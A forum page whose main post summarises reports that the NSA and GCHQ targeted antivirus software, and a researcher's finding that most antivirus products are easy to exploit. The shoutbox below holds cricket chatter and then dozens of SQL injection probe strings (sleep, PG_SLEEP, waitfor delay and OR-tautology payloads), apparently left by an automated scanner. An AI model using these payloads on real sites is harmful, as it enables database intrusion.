>

Has The NSA Hacked Your Security Software?

  • Chin
  • Topic Author
  • Visitor
  • Visitor
29 Jul 2015 13:51 #265617 by Chin
Has The NSA Hacked Your Security Software?
Category: Anti-Virus


According to new documents released by Edward Snowden, the NSA and its British counterpart have, for several years, been hacking away at popular consumer security programs in order to subvert their protections. Read on to find out if your anti-virus protection is actually the WEAKEST link in your security chain...
The Weakest Link?

Snowden's latest bombshell that government spy agencies may be targeting and subverting the very software we rely on to secure our computers is unwelcome news. But this disturbing revelation has led to another.
At least one security researcher claims that the software millions depend upon to protect them from hackers is actually more vulnerable to hacking than notorious hacker targets such as Adobe Reader, Microsoft Word, Google Chrome, and others.
The leaked documents include NSA internal communications and correspondences with the UK’s Government Communications Headquarters (GCHQ). They reveal that the spy agencies have long sought to reverse-engineer Kaspersky Lab’s Internet Security suite and other widely used anti-malware/anti-hacking products. Kaspersky alone claims more than 270,000 corporate clients and 400 million individual users worldwide.

Antivirus Hacking
Besides reverse-engineering, the spy agencies have eavesdropped on communications between installed copies of security programs and their developers, gleaning intelligence from the malware reports and error messages that these programs send home. They’ve also intercepted customer support emails between security software vendors and corporate clients that could aid in subverting security software.

Security software is an especially valuable target to hackers because such products typically have high-level privileges on the host machine. If a hacker can infiltrate a security product, he usually gets instant control over the entire system in just one fell swoop. Hacking a less-privileged program may require additional steps to gain the desired access privileges.
But Wait, There's Less!

Here’s the second alarming news. Joxean Koret, a researcher with Coseinc, a Singapore-based information security consultancy, told The Intercept: “Anti-virus products, with only a few exceptions, are years behind security-conscious client-side applications like browsers or document readers. It means that Acrobat Reader, Microsoft Word or Google Chrome are harder to exploit than 90 percent of the anti-virus products out there.”
Ironic, isn’t it? It’s a case of “who’s watching the watchers?” A set of slides that Koret used in an April 2014 security conference presentation goes into greater depth on the vulnerabilities of security software, and it’s surprisingly easy for non-technical readers to follow.

The 10 percent of antivirus products that are not so easily exploited include F-Secure, VIPRE, and Comodo AV. But even these programs contained at least on exploitable flaw, Koret discovered. Avast received kudos for two things: Having a "bug bounty" program which encourages researchers to look for exploitable flaws, and for quickly fixing one reported problem.
How Vulnerable Are You?

In my opinion, the big scary news here is not that the NSA and GCHQ probably know how to hack most popular security programs. It’s unlikely that they are after your personal system unless you’re involved in activities deemed “threats to national security.”
No, the truly scandalous news (if everything in Koret's paper is accurate) is that anti-virus software actually "makes you more vulnerable to skilled attackers" because many security software developers aren't very good at what they do. His paper details rookie software errors, as well as poor development, review and testing procedures.
If there's a silver lining here, it's that Koret's paper was published over a year ago, with some detailed advice for anti-virus software companies. Hopefully, Koret’s research has received enough attention to pressure anti-malware developers into cleaning up their own houses. One can only hope.

Please Log in or Create an account to join the conversation.

Time to create page: 0.158 seconds
MaleahBREAKING: The government of Pakistan has said that Pakistan will boycott their T20 World Cup match against India(01.02.2026, 11:02)(11:02)0
ketchimGot Florida Hass theodday from my buddy visiting here !(22.01.2026, 19:37)(19:37)0
ketchimICC tell Bangladseh they will be REPLACED !(22.01.2026, 19:17)(19:17)0
MaleahGuyanese people in Florida can't just go and catch a dozen or two dozen HASSA; they have to catch over 5 million.
This is called Greed
(07.01.2026, 13:14)(13:14)1
MaleahNow that Joe Root has 2 centuries in Australia, I assume those Australian fans, who said he couldn’t be classed as great unless he achieved that, will now say he is?? Given that the great Steve Smith has never scored a test ton in Pakistan….(05.01.2026, 12:31)(12:31)0
MaleahThe Bangladesh Cricket Board has formally asked the ICC to move all of Bangladesh’s matches out of India, citing safety and security concerns.

#T20WorldCup
(04.01.2026, 14:18)(14:18)0
Gwen20(03.01.2026, 13:42)(13:42)0
Gwen(select 198766*667891 from DUAL)(03.01.2026, 13:42)(13:42)0
Gwen(select 198766*667891)(03.01.2026, 13:42)(13:42)0
Gwen@@iBQ3X(03.01.2026, 13:42)(13:42)0
Gwen20'"(03.01.2026, 13:42)(13:42)0
Gwen20(03.01.2026, 13:42)(13:42)0
Gwen20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'(03.01.2026, 13:42)(13:42)0
Johan20(03.01.2026, 13:42)(13:42)0
Gwen20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)(03.01.2026, 13:41)(13:41)0
Gwen20F4owsBb6')) OR 756=(SELECT 756 FROM PG_SLEEP(15))--(03.01.2026, 13:41)(13:41)0
Gwen20axQfaI3h') OR 505=(SELECT 505 FROM PG_SLEEP(15))--(03.01.2026, 13:40)(13:40)0
Gwen20GCVWFMgw' OR 960=(SELECT 960 FROM PG_SLEEP(15))--(03.01.2026, 13:40)(13:40)0
Gwen20-1)) OR 426=(SELECT 426 FROM PG_SLEEP(15))--(03.01.2026, 13:39)(13:39)0
Gwen20-1) OR 573=(SELECT 573 FROM PG_SLEEP(15))--(03.01.2026, 13:39)(13:39)0
Gwen20-1 OR 604=(SELECT 604 FROM PG_SLEEP(15))--(03.01.2026, 13:38)(13:38)0
Gwen20ZWzru47i'; waitfor delay '0:0:15' --(03.01.2026, 13:38)(13:38)0
Gwen20-1 waitfor delay '0:0:15' --(03.01.2026, 13:38)(13:38)0
Gwen20-1); waitfor delay '0:0:15' --(03.01.2026, 13:37)(13:37)0
Gwen20-1; waitfor delay '0:0:15' --(03.01.2026, 13:36)(13:36)0
Gwen(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/(03.01.2026, 13:36)(13:36)0
Gwen200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z(03.01.2026, 13:36)(13:36)0
Gwen200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z(03.01.2026, 13:35)(13:35)0
Gwen20*if(now()=sysdate(),sleep(15),0)(03.01.2026, 13:35)(13:35)0
Gwen-1" OR 18=18 or "FwfsM7AR"="(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 3*2<5 or "FwfsM7AR"="(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 5*5=26 or "FwfsM7AR"="(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 5*5=25 or "FwfsM7AR"="(03.01.2026, 13:34)(13:34)0
Gwen-1' OR 641=641 or 'eESQ4mw4'='(03.01.2026, 13:34)(13:34)0
Gwen-1' OR 3*2<5 or 'eESQ4mw4'='(03.01.2026, 13:34)(13:34)0
Gwen-1' OR 5*5=26 or 'eESQ4mw4'='(03.01.2026, 13:34)(13:34)0
Gwen-1' OR 5*5=25 or 'eESQ4mw4'='(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 3*2>5 --(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 3*2>999 --(03.01.2026, 13:34)(13:34)0
Gwen-1" OR 5*5=25 --(03.01.2026, 13:34)(13:34)0
Gwen-1' OR 5*5=26 --(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 3*2>5(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 3*2>999(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 5*5=25(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 3*2>5 --(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 3*2>999 --(03.01.2026, 13:34)(13:34)0
Gwen-1 OR 5*5=25 --(03.01.2026, 13:34)(13:34)0
Gwen20(03.01.2026, 13:34)(13:34)0
Gwen204tYynwAI(03.01.2026, 13:34)(13:34)0
Gwen20(03.01.2026, 12:02)(12:02)0
Addilynn
Go to top